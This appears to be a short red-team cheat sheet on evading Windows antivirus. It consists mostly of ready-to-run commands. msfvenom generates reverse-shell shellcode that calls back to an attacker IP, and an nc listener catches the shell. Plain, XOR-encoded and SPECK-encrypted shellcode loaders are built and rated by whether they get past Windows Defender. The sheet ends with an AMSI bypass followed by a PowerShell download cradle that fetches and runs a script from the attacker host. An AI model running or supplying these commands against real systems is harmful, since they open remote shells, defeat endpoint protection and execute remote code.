Skip to content

Evasion basics cheatsheet

Warning

Work in progress

Windows

Simple shellcode loader

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.11 LPORT=4444 -f c
nc -nlvp 4444

# on redtools/windows/shellcode-loader
x86_64-w64-mingw32-g++ runner.cpp -o runner.exe -static-libgcc -static-libstdc++ -static

.\runner.exe

Very basic; detected by every up-to-date systems with standard protection enabled.

XORed shellcode loader

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.11 LPORT=4444 -f hex -o /tmp/shell_reverse_tcp.hex

# on redtools/utils/
python xor_encoder.py -s /tmp/shell_reverse_tcp.hex -k 5A -f cpp

# on redtools/windows/xor-shellcode-loader
# replace payload variable value
x86_64-w64-mingw32-g++ runner.cpp -o runner.exe -static-libgcc -static-libstdc++ -static -nostartfiles -Wl,--entry,start -Wl,--subsystem,windows

Always the same; using simple windows defender protection.

SPECK encrypted shellcode loader

# on redtools/utils
# replace payload variable value
go run speck_encrypt.go

# on redtools/windows/speck-shellcode-loader/go
# replace shellcodeEncrypted variable value with the one generated with speck_encrypt.go
GOOS=windows GOARCH=amd64 go build -o runner.exe main.go

Using this cryptography method, it bypasses basic Windows Defender protection but dond't do anything against dynamic analysis.

AMSI Bypass

# initial test
Invoke-Expression "AMSI Test Sample: 7e72c3ce-861b-4339-8740-0ac1484c1386"
Invoke-Mimikatz

https://amsi.fail/ Generate a payload and padste it in current powershell context. Retry initial test

Now run your ps1: 

IEX(New-Object Net.WebClient).downloadString('http://10.0.0.11:8000/winPEAS.ps1')